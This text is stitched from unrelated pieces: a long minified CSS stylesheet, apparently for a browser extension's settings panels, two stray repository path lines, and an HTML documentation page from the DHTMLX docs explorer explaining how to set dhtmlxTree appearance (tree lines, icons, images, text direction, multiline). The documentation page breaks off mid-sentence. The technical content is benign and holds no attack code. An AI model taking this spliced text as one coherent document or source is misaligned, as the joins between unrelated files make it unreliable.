#colornightmodebck8,#colortitelnightmodetxt8,#colortitelnightmodehyperlink8,#colortitelnightmodebutton8,#colortitelnightmodeborder8{background-color:white} .nightheader{position:relative;height:105px;background:#01579B;color:white;font-size:20px;line-height:58px;padding:0 16px;overflow:hidden} .nightheader video{position:absolute;top:-65px;left:0} .nightheader span{position:absolute} .atmosheader{position:relative;height:105px;background:#757575;color:white;font-size:20px;line-height:58px;padding:0 16px;overflow:hidden} .atmosheader video{position:absolute;top:-45px;left:0} .atmosheader span{position:absolute} .analyticsheader{position:relative;height:105px;background:#43A047;;color:white;font-size:20px;line-height:58px;padding:0 16px;overflow:hidden} .analyticsheader video{position:absolute;top:-45px;left:0} .analyticsheader span{position:absolute} .pipheader{position:relative;height:105px;background:#757575;color:white;font-size:20px;line-height:58px;padding:0 16px;overflow:hidden} .pipheader video{position:absolute;top:-45px;left:0} .pipheader span{position:absolute} #btnpipvideo,#btnpipvisual{width:100%} #btngonight{width:100%} /* Checkbox */ .md-checkbox{position:relative;margin:16px 0;box-sizing:border-box} .md-checkbox label{cursor:pointer;box-sizing:border-box;min-height:20px;display:grid;align-items:center} .md-checkbox label div{box-sizing:border-box;margin-left:30px} .md-checkbox label::before,.md-checkbox label::after{content:"";position:absolute;left:0;top:0;box-sizing:border-box} .md-checkbox label::before{width:20px;height:20px;background:var(--totl-checkbox-label-background);border:var(--totl-checkbox-label-border);border-radius:2px;cursor:pointer;transition:background 0.3s;box-sizing:border-box} .md-checkbox input[type=checkbox]{outline:0;margin-right:15px;box-sizing:border-box;width:12px;height:12px;opacity:0;display:none;float:left} .md-checkbox input[type="checkbox"]:checked + label::before{background:var(--totl-checkbox-checked);border:none;box-sizing:border-box} .md-checkbox input[type="checkbox"]:checked + label::after{transform:rotate(-45deg);top:5px;left:4px;width:12px;height:6px;border:2px solid #fff;border-top-style:none;border-right-style:none;box-sizing:border-box} .md-checkbox input[type="checkbox"]:checked[disabled] + label::before{background:var(--totl-checkbox-checked-disabled);border:var(--totl-checkbox-checked-disabled-border)} .md-checkbox input[type="checkbox"][disabled] + label::before{border:var(--totl-checkbox-checked-disabled-border)} /* Radio button */ .md-radio{position:relative;margin:16px 0;box-sizing:border-box} .md-radio label{cursor:pointer;box-sizing:border-box;min-height:20px;display:grid;align-items:center} .md-radio label div{box-sizing:border-box;margin-left:30px} .md-radio label::before, .md-radio label::after{content:"";position:absolute;left:0;top:0;box-sizing:border-box} .md-radio label::before{width:20px;height:20px;background:var(--totl-radio-label-background);border:var(--totl-radio-label-border);border-radius:50%;transition:all .3s ease;transition-property:transform,border-color;box-sizing:border-box} .md-radio input[type=radio]{outline:0;margin-right:10px;box-sizing:border-box;width:12px;height:12px;opacity:0;display:none} .md-radio input[type="radio"]:checked + label:before{border-color:var(--totl-radio-checked-border);box-sizing:border-box} .md-radio input[type="radio"]:checked + label:after{transform:scale(1);top:5px;left:5px;width:10px;height:10px;border-radius:50%;background:var(--totl-radio-checked-border);box-sizing:border-box} .md-radio input[type="radio"]:checked[disabled] + label::before{border-color:var(--totl-radio-checked-disabled)} .md-radio input[type="radio"]:checked[disabled] + label::after{background:var(--totl-radio-checked-disabled)} .md-radio input[type="radio"][disabled] + label::before{border-color:var(--totl-radio-checked-disabled)} /* Rate panel */ #materialModalRate{position:absolute;background:var(--totl-primary-background);top:0;bottom:0;right:0;left:0;width:100%;height:100%;min-height:416px} #materialModalRate.hide{opacity:0;transition:opacity 0.2s ease-out;pointer-events:none} #materialModalRate.hide #materialModalRateCentered{transform:scale(0.8);transition:transform 0.2s ease-out} #materialModalRate.show{opacity:1;transition:opacity 0.2s ease-in} #materialModalRate.show #materialModalRateCentered{transform:scale(1);transition:transform 0.2s ease-in} #materialModalContent{border-radius:2px;padding:14px;position:relative;color:var(--totl-primary-font-color);background:var(--totl-primary-background);max-width:485px;min-height:200px;margin:auto;box-shadow:0px 10px 20px 0px rgba(0,0,0,0.4);box-sizing:border-box;-webkit-user-select:none;-moz-user-select:none;user-select:none} #materialModalTitle{margin:10px;font-weight:bold;font-size:16px} #materialModalText{margin:10px;margin-bottom:60px} #materialModalButtons{width:calc(100% - 24px);position:absolute;bottom:0px} .materialModalButton{-webkit-user-select:none;-moz-user-select:none;user-select:none;margin:8px 0;float:right;background:0 0;border:none;border-radius:2px;color:#2296f3;position:relative;height:36px;min-width:64px;padding:0 16px;font-family:"Roboto","Helvetica","Arial",sans-serif;font-size:14px;font-weight:500;text-transform:uppercase;letter-spacing:0;overflow:hidden;outline:none;cursor:pointer;text-decoration:none;text-align:center;line-height:36px;vertical-align:middle} .materialModalButton:active{background-color:rgba(158,158,158,.4)} .materialModalButton:hover{background-color:rgba(158,158,158,.2)} #materialModalRateTitle{margin:24px;font-weight:bold;font-size:16px} #materialModalRateText{margin:24px;margin-bottom:60px} #materialModalRateButtons{width:calc(100% - 8px);position:absolute;bottom:0px} #materialModalRateContent img{height:150px;display:flex;margin:auto} /* Other colors */ .customcolors input[type="color"]{-webkit-appearance:none;border:none;width:22px;height:22px;padding:0px;margin:2px;border-radius:22px;overflow:hidden} .customcolors input[type="color"]::-webkit-color-swatch-wrapper{padding:0} .customcolors input[type="color"]::-webkit-color-swatch{border:none} .customcolors{height:26px;width:26px;background:conic-gradient(red,yellow,lime,aqua,blue,magenta,red);border-radius:20px;margin:2px;display:inline-block;vertical-align:top} /* Toggle */ .switch{position:relative;display:inline-block;width:47px;height:24px} .switch input{opacity:0;width:0;height:0} .slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#ccc;-webkit-transition:.4s;transition:.4s} .slider:before{position:absolute;content:"";height:20px;width:20px;left:2px;bottom:2px;background-color:white;-webkit-transition:.4s;transition:.4s} input:checked + .slider{background-color:#2196F3} input:focus + .slider{box-shadow:0 0 1px #2196F3} input:checked + .slider:before{-webkit-transform:translateX(22px);-ms-transform:translateX(22px);transform:translateX(22px)} .switch input:checked[disabled] + .slider{background-color:var(--totl-checkbox-checked-disabled)} /* Rounded sliders */ .slider.round{border-radius:20px} .slider.round:before{border-radius:50%} /* Site table */ .sitetitle{font-size:12px;margin-bottom:5px;text-transform:uppercase} .siteleft{float:left;display:flex;flex-flow:column;height:40px;justify-content:center;padding-left:5px} .siteright{float:right;display:flex;flex-flow:column;height:40px;justify-content:center;padding-right:5px} /* Tip box */ #materialModalScroll{position:absolute;background:var(--totl-primary-background);top:0;bottom:0;right:0;left:0;width:100%;height:100%;min-height:416px} #materialModalScroll.hide{opacity:0;transition:opacity 0.2s ease-out;pointer-events:none} #materialModalScroll.hide #materialModalScrollCentered{transform:scale(0.8);transition:transform 0.2s ease-out} #materialModalScroll.show{opacity:1;transition:opacity 0.2s ease-in} #materialModalScroll.show #materialModalScrollCentered{transform:scale(1);transition:transform 0.2s ease-in} #materialModalScrollTitle{margin:24px;font-weight:bold;font-size:16px} #materialModalScrollText{margin:24px;margin-bottom:60px} #materialModalScrollButtons{width:calc(100% - 8px);position:absolute;bottom:0px} #materialModalScrollContent img{height:150px;display:flex;margin:auto} /* Scroll animation */ #container{display:flex;flex-direction:column;justify-content:center;align-items:center;height:200px} .box{width:200px;height:108px;text-align:center} .endline{background:var(--totl-primary-font-color);opacity:.6;height:2px;width:200px;text-align:center} .scrollpanel{display:inline-block;border:1px solid var(--totl-hr-border);border-top-left-radius:5px;width:120px;border-top-right-radius:5px;height:102px;padding:3px} .rectangle{height:35px;width:170px;border:var(--totl-minitable-tab-border);margin-top:30px;border-radius:2px} .rectangleinside{height:100%;width:120px;background:var(--totl-analytic-background-hover)} .democolor{display:block;float:right;margin-right:8px;margin-top:3px} .linedash{position:absolute;top:92px;width:100px;margin-left:10px} .dash{height:2px;width:20px;background:var(--totl-primary-font-color);margin:5px;display:inline-block;opacity:.6} @media screen and (min-width: 301px){ body{width:100%} .nightheader video{position:absolute;top:-80px;left:0;width:100%;height:auto} .atmosheader video{position:absolute;top:-50px;left:0;width:100%;height:auto} .analyticsheader video{position:absolute;top:-50px;left:0;width:100%;height:auto} .pipheader video{position:absolute;top:-50px;left:0;width:100%;height:auto} #colorpal{max-width:270px;margin:20px auto} .oan{display:flex;justify-content:center;width:auto} }
dhtmlx/docsExplorer/dhtmlxtree/dhtmlxtree___setting_tree_appearance.html
regadou/waw
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css" type="text/css" media="screen" title="no title" charset="utf-8"><title> dhtmlxtree:setting_tree_appearance [DHX documentation] </title></head> <body> <div class="dokuwiki"> <div class="stylehead"> <div class="header"> <a class="logo" href="http://dhtmlx.com" title="DHTMLX Home Page"></a> <span class="tittle-dhtmlx">DHTMLX Docs & Samples Explorer</span> <div class="search-field"> <form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form> </div> <div class="buttons"> <a class="doc"></a> <a title="DHTMLX Samples homepage" href="../samples.html" class="sample"/></a> </div> <!-- <div class="pagename"> [[<a href="#" title="Backlinks">dhtmlxtree:setting_tree_appearance</a>]] </div> <div class="logo"> <a href="/dhtmlx/docs/doku.php" name="dokuwiki__top" id="dokuwiki__top" accesskey="h" title="[H]">DHX documentation</a> </div> <div class="clearer"></div>--> </div> <!-- <div class="bar" id="bar__top"> <div class="bar-left" id="bar__topleft"> <form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> <form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form> </div> <div class="bar-right" id="bar__topright"> <form class="button btn_recent" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="recent" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Recent changes" class="button" accesskey="r" title="Recent changes [R]" /></div></form> <form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form>&nbsp; </div> <div class="clearer"></div> </div> --> <!-- <div class="breadcrumbs"> <span class="bchead">Trace:</span> <span class="bcsep">&raquo;</span> <span class="curid"><a href="/dhtmlx/docs/doku.php?id=dhtmlxtree:setting_tree_appearance" class="breadcrumbs" title="dhtmlxtree:setting_tree_appearance">setting_tree_appearance</a></span> </div> --> </div> <div class="page"> <!-- wikipage start --> <!-- TOC START --> <div class="toc"> <div class="tocheader toctoggle" id="toc__header">Table of Contents</div> <div id="toc__inside"> <ul class="toc"> <li class="clear"> <ul class="toc"> <li class="level2"><div class="li"><span class="li"><a href="#setting_tree_appearance" class="toc">Setting Tree Appearance</a></span></div> <ul class="toc"> <li class="level3"><div class="li"><span class="li"><a href="#tree_lines_and_icons_manipulation" class="toc">Tree Lines and Icons Manipulation</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#tree_images_manipulation" class="toc">Tree Images Manipulation</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#text_manipulation" class="toc">Text Manipulation</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#style_manipulation" class="toc">Style Manipulation</a></span></div></li></ul> </li></ul> </li></ul> </div> </div> <!-- TOC END --> <p> <div class='backlinks'><div class='backlink last_backlink'><img src="icons___file.gif" class="media" alt="" /><a href="../index.html" class="wikilink1" title="start">Index</a></div><div class='arrow'></div><div class='backlink last_backlink'><img src="icons___tree.gif" class="media" alt="" /><a href="index.html" class="wikilink1" title="dhtmlxtree:toc">dhtmlxtree</a></div></div> </p> <h2><a name="setting_tree_appearance" id="setting_tree_appearance">Setting Tree Appearance</a></h2> <div class="level2"> </div> <div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="53-92" /><input type="hidden" name="rev" value="1335526056" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit" class="button" title="Setting Tree Appearance" /></div></form></div> <h3><a name="tree_lines_and_icons_manipulation" id="tree_lines_and_icons_manipulation">Tree Lines and Icons Manipulation</a></h3> <div class="level3"> </div> <h4><a name="enabling_disabling_tree_lines" id="enabling_disabling_tree_lines">Enabling/Disabling Tree Lines</a></h4> <div class="level4"> <p> Tree lines are tiny lines that visually “connect” elements of the tree. These lines can be enabled|disabled from script easily: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableTreeLines</span><span class="br0">&#40;</span><span class="kw2">true</span>|false<span class="br0">&#41;</span>; <span class="co1">// true by default</span> <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <h4><a name="setting_-_icons" id="setting_-_icons">Setting +/- Icons</a></h4> <div class="level4"> <p> ”+” and ”-” icons indicate whether a parent node is closed or opened. setImageArrays() is used to set these images: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setImageArrays</span><span class="br0">&#40;</span>arrayName<span class="sy0">,</span>image1<span class="sy0">,</span>image2<span class="sy0">,</span>image3<span class="sy0">,</span>image4<span class="sy0">,</span>image5<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The parameters for this method are as follows: </p> <ul> <li class="level1"><div class="li"> arrayName - name of array: plus, minus;</div> </li> <li class="level1"><div class="li"> image1 - line crossed image (+);</div> </li> <li class="level1"><div class="li"> image2 - image with top line (г);</div> </li> <li class="level1"><div class="li"> image3 - image with bottom line (L);</div> </li> <li class="level1"><div class="li"> image4 - image without line ( );</div> </li> <li class="level1"><div class="li"> image5 - single root image (-).</div> </li> </ul> </div> <h4><a name="showing_hiding_-_icons" id="showing_hiding_-_icons">Showing/Hiding +/- Icons</a></h4> <div class="level4"> <p> There is a simple way of showing/hiding +/- signs of a certain item: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">showItemSign</span><span class="br0">&#40;</span>itemId<span class="sy0">,</span>mode<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The following parameters should be indicated: </p> <ul> <li class="level1"><div class="li"> itemId - id of the item which +/- icon will be shown/hidden;</div> </li> <li class="level1"><div class="li"> mode(true|false) - true stands for showing the icon, false means hiding it.</div> </li> </ul> <p> This method works only for individual items, not for the entire tree. </p> </div> <h4><a name="specifying_icons_for_locked_items" id="specifying_icons_for_locked_items">Specifying Icons for Locked Items</a></h4> <div class="level4"> <p> If the user wants to specify the icons for locked state of tree items, they should be indicated before any of the data loading methods: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> ... <span class="me1">tree</span>.<span class="me1">setLockedIcons</span><span class="br0">&#40;</span><span class="st0">&quot;lock.gif&quot;</span><span class="sy0">,</span><span class="st0">&quot;lock.gif&quot;</span><span class="sy0">,</span><span class="st0">&quot;lock.gif&quot;</span><span class="br0">&#41;</span>; tree.<span class="me1">loadXML</span><span class="br0">&#40;</span><span class="st0">&quot;tree.xml&quot;</span><span class="br0">&#41;</span> <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The parameters of setLockedIcons() method indicate paths to the icons that will be used for locked nodes: </p> <ul> <li class="level1"><div class="li"> m0 - icon for a locked leaf;</div> </li> <li class="level1"><div class="li"> im1 - icon for a closed branch;</div> </li> <li class="level1"><div class="li"> im2 - icon for an opened branch.</div> </li> </ul> </div> <div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="93-2014" /><input type="hidden" name="rev" value="1335526056" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit" class="button" title="Tree Lines and Icons Manipulation" /></div></form></div> <h3><a name="tree_images_manipulation" id="tree_images_manipulation">Tree Images Manipulation</a></h3> <div class="level3"> </div> <h4><a name="setting_images_for_items" id="setting_images_for_items">Setting Images for Items</a></h4> <div class="level4"> <p> It should be noted that the tree will get images for its nodes from the path the user specified in setImagePath() method. </p> <p> But there are also other ways available for setting custom images for nodes in the tree. The difference between these two methods lies in the way the user adds item to the tree: </p> <ul> <li class="level1"><div class="li"> JavaScript way - using arguments of insertNewChild() or insertNewNext() methods:</div> </li> </ul> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> <span class="kw2">var</span> im0 <span class="sy0">=</span> <span class="st0">&quot;doc.gif&quot;</span>; <span class="co1">// the icon for a leaf node</span> <span class="kw2">var</span> im1 <span class="sy0">=</span> <span class="st0">&quot;opened.gif&quot;</span>; <span class="co1">// the icon for an expanded parent node</span> <span class="kw2">var</span> im2 <span class="sy0">=</span> <span class="st0">&quot;closed.gif&quot;</span>; <span class="co1">// the icon for a collapsed parent node</span> &nbsp; &nbsp; &nbsp; tree.<span class="me1">insertNewItem</span><span class="br0">&#40;</span>0<span class="sy0">,</span><span class="nu0">1</span><span class="sy0">,</span><span class="st0">&quot;New Node 1&quot;</span><span class="sy0">,</span>0<span class="sy0">,</span>im0<span class="sy0">,</span>im1<span class="sy0">,</span>im2<span class="br0">&#41;</span>; tree.<span class="me1">insertNewNext</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="sy0">,</span><span class="nu0">2</span><span class="sy0">,</span><span class="st0">&quot;New Node 2&quot;</span><span class="sy0">,</span>0<span class="sy0">,</span><span class="st0">&quot;txt.gif&quot;</span><span class="sy0">,</span><span class="st0">&quot;opened.gif&quot;</span><span class="sy0">,</span><span class="st0">&quot;closed.gif&quot;</span><span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre><ul> <li class="level1"><div class="li"> JavaScript way - using setItemImage() and setItemImage2() methods:</div> </li> </ul> <p> The first method for setting an image for an item should be written this way: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setItemImage</span><span class="br0">&#40;</span>itemId<span class="sy0">,</span>image1<span class="sy0">,</span>image2<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The parameters are as follows: </p> <ul> <li class="level1"><div class="li"> itemId - id of the item in question;</div> </li> <li class="level2"><div class="li"> image1 - image for the leaf item or image for the collapsed parent item (if the third parameter is indicated);</div> </li> <li class="level2"><div class="li"> image2 - image for the expanded parent item.</div> </li> </ul> <p> The second setting image method is the following: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setItemImage2</span><span class="br0">&#40;</span>itemId<span class="sy0">,</span>image1<span class="sy0">,</span>image2<span class="sy0">,</span> image3<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The parameters are as follows: </p> <ul> <li class="level1"><div class="li"> itemId - id of the item in question;</div> </li> <li class="level2"><div class="li"> image1 - image for the leaf item;</div> </li> <li class="level2"><div class="li"> image2 - image for the collapsed parent item;</div> </li> <li class="level2"><div class="li"> image3 - image for the expanded parent item.</div> </li> </ul> <ul> <li class="level1"><div class="li"> <acronym title="Extensible Markup Language">XML</acronym> way - using parameters of &lt;item&gt; tag:</div> </li> </ul> <pre class="code javascript"> <span class="sy0">&lt;?</span>xml version<span class="sy0">=</span><span class="st0">'1.0'</span> encoding<span class="sy0">=</span><span class="st0">'iso-8859-1'</span><span class="sy0">&gt;</span> <span class="sy0">&lt;</span>tree id<span class="sy0">=</span><span class="st0">&quot;0&quot;</span><span class="sy0">&gt;</span> <span class="sy0">&lt;</span>item text<span class="sy0">=</span><span class="st0">&quot;My Computer&quot;</span> id<span class="sy0">=</span><span class="st0">&quot;1&quot;</span> child<span class="sy0">=</span><span class="st0">&quot;1&quot;</span> im0<span class="sy0">=</span><span class="st0">&quot;doc.gif&quot;</span> im1<span class="sy0">=</span><span class="st0">&quot;my_opened.gif&quot;</span> im2<span class="sy0">=</span><span class="st0">&quot;my_closed.gif&quot;</span><span class="sy0">&gt;</span> <span class="sy0">&lt;/</span>tree<span class="sy0">&gt;</span> &nbsp;</pre> <p> See <a href="dhtmlxtree___syntax_templates.html" class="wikilink1" title="dhtmlxtree:syntax_templates">XML Format Template</a>. </p> </div> <h4><a name="getting_item_s_image" id="getting_item_s_image">Getting Item&#039;s Image</a></h4> <div class="level4"> <p> Item&#039;s image can be got with the help of getItemImage() method: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> <span class="kw2">var</span> image <span class="sy0">=</span> tree.<span class="me1">getItemImage</span><span class="br0">&#40;</span>itemId<span class="sy0">,</span>imageInd<span class="sy0">,</span>fullPath<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> In order to get items image, the user should indicate: </p> <ul> <li class="level1"><div class="li"> itemId - id of the item which image should be got;</div> </li> <li class="level1"><div class="li"> imageInd - index of the image (0 - leaf image, 1 - closed parent node image, 2 - open parent node image);</div> </li> <li class="level1"><div class="li"> fullPath (true|false) - indicates whether the method returns full path to the image (true), or just name of the image file (false).</div> </li> </ul> </div> <h4><a name="enabling_tree_images" id="enabling_tree_images">Enabling Tree Images</a></h4> <div class="level4"> <p> Images are enabled in dhtmlxTree by default. To disable images, the user should call the following method: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableTreeImages</span><span class="br0">&#40;</span><span class="kw2">false</span><span class="br0">&#41;</span>; <span class="co1">// true to enable</span> <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <h4><a name="setting_default_item_s_images" id="setting_default_item_s_images">Setting Default Item&#039;s Images</a></h4> <div class="level4"> <p> There is a simple way of setting default item&#039;s images in dhtmlxTree: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setStdImages</span><span class="br0">&#40;</span>image1<span class="sy0">,</span>image2<span class="sy0">,</span>image3<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> This method should be called before <acronym title="Extensible Markup Language">XML</acronym> loading takes place. It is useful when a lot of similar images are going to be used in the tree, it is better to use this method once rather than specify these images every time for every item. </p> <p> The parameters that the user should specify are the following: </p> <ul> <li class="level1"><div class="li"> image1 - image for a leaf node;</div> </li> <li class="level1"><div class="li"> image2 - image for a closed parent node;</div> </li> <li class="level1"><div class="li"> image3 - image for an opened parent node.</div> </li> </ul> </div> <h4><a name="changing_icon_sets" id="changing_icon_sets">Changing Icon Sets</a></h4> <div class="level4"> <p> dhtmlxTree is a highly customizable component. You can use different icon sets for trees simply by changing image path: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setImagePath</span><span class="br0">&#40;</span><span class="st0">&quot;[full path to this folder]/codebase/images/&quot;</span><span class="br0">&#41;</span>; <span class="co1">// the default icons set</span> <span class="co1">// or</span> tree.<span class="me1">setImagePath</span><span class="br0">&#40;</span><span class="st0">&quot;[full path to this folder]/codebase/images/csh_scbrblue/&quot;</span><span class="br0">&#41;</span>; <span class="co1">// or</span> tree.<span class="me1">setImagePath</span><span class="br0">&#40;</span><span class="st0">&quot;[full path to this folder]/codebase/images/csh_yellowbooks/&quot;</span><span class="br0">&#41;</span>; <span class="co1">// or</span> ... <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <h4><a name="setting_icon_s_size" id="setting_icon_s_size">Setting Icon&#039;s Size</a></h4> <div class="level4"> <p> Setting icon&#039;s size is quite simple with setIconSize() method. The default size of tree icons is 18&times;18 px. </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setIconSize</span><span class="br0">&#40;</span>newWidth<span class="sy0">,</span>newHeight<span class="sy0">,</span>itemId<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The parameters the user should specify are: </p> <ul> <li class="level1"><div class="li"> newWidth - new width for the icon;</div> </li> <li class="level1"><div class="li"> newHeight- new height for the icon;</div> </li> <li class="level1"><div class="li"> itemId - the item new sizes will be applied to (optional parameter).</div> </li> </ul> <p> If the last parameter is not indicated, new sizes will be applied to all icons in the tree. </p> </div> <h4><a name="making_images_clickable" id="making_images_clickable">Making Images Clickable</a></h4> <div class="level4"> <p> There is a simple method used to make all images in the tree clickable: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableActiveImages</span><span class="br0">&#40;</span><span class="kw2">true</span>|fasle<span class="br0">&#41;</span>; <span class="co1">// enabled by default</span> <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <h4><a name="enabling_image_dragging" id="enabling_image_dragging">Enabling Image Dragging</a></h4> <div class="level4"> <p> There is a method that is responsible for allowing the user to drag items not only by text, but also by their images. This functionality is enabled by default </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableImageDrag</span><span class="br0">&#40;</span><span class="kw2">true</span>|false<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <h4><a name="enabling_ie_images_fixing" id="enabling_ie_images_fixing">Enabling IE Images Fixing</a></h4> <div class="level4"> <p> There is a special method to change the way of images rendering in <acronym title="Internet Explorer">IE</acronym>. It also helps to solve the problem of images caching in <acronym title="Internet Explorer">IE</acronym>: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableIEImageFix</span><span class="br0">&#40;</span><span class="kw2">true</span>|false<span class="br0">&#41;</span>; <span class="co1">// disabled by default</span> <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="2015-7470" /><input type="hidden" name="rev" value="1335526056" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit" class="button" title="Tree Images Manipulation" /></div></form></div> <h3><a name="text_manipulation" id="text_manipulation">Text Manipulation</a></h3> <div class="level3"> </div> <h4><a name="setting_text_direction" id="setting_text_direction">Setting text Direction</a></h4> <div class="level4"> <p> dhtmlxTree support bot LTR and RTL text directions. LTR is set by default in the tree. The user can set the text direction to RTL like this: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableRTL</span><span class="br0">&#40;</span><span class="kw2">true</span><span class="br0">&#41;</span>; <span class="co1">// false to disable</span> <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> To set text direction to LTR again, use false in the above mentioned method. </p> </div> <h4><a name="enabling_multiline" id="enabling_multiline">Enabling Multiline</a></h4> <div class="level4"> <p> By default tree nodes&#039; labels can contain only one text line. However, in some situations it can be useful to make them multiline. There is a special method for this in dhtmlxTree. It is recommended to turn tree lines off for better appearance: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableTreeLines</span><span class="br0">&#40;</span><span class="kw2">false</span><span class="br0">&#41;</span>; tree.<span class="me1">enableMultiLineItems</span><span class="br0">&#40;</span><span class="kw2">true</span>|false|width<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> This method should be called before loading tree data takes place. The parameter of this method can be one of these options: </p> <ul> <li class="level1"><div class="li"> true - the multiline is enabled;</div> </li> <li class="level1"><div class="li"> false - the multiline is disabled;</div> </li> <li class="level1"><div class="li"> width - the multiline is enabled and set in pixels (for example, “50px”).</div> </li> </ul> </div> <h4><a name="setting_text_signs" id="setting_text_signs">Setting Text Signs</a></h4> <div class="level4"> <p> There is the possibility to enable|disable text signs [+] and [-] instead of corresponding icons. This can be done in the following way: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree. <span class="me1">enableTextSigns</span><span class="br0">&#40;</span>mode<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> Setting this method to true equals enabling text signs for the tree, while false means disabling them. </p> </div> <h4><a name="making_plain_text_tree" id="making_plain_text_tree">Making Plain Text Tree</a></h4> <div class="level4"> <p> There is also the possibility to create a plain one-level tree. The steps the user should take for this are quite simple: </p> <ul> <li class="level1"><div class="li"> Add the following style in the html file where the tree will be 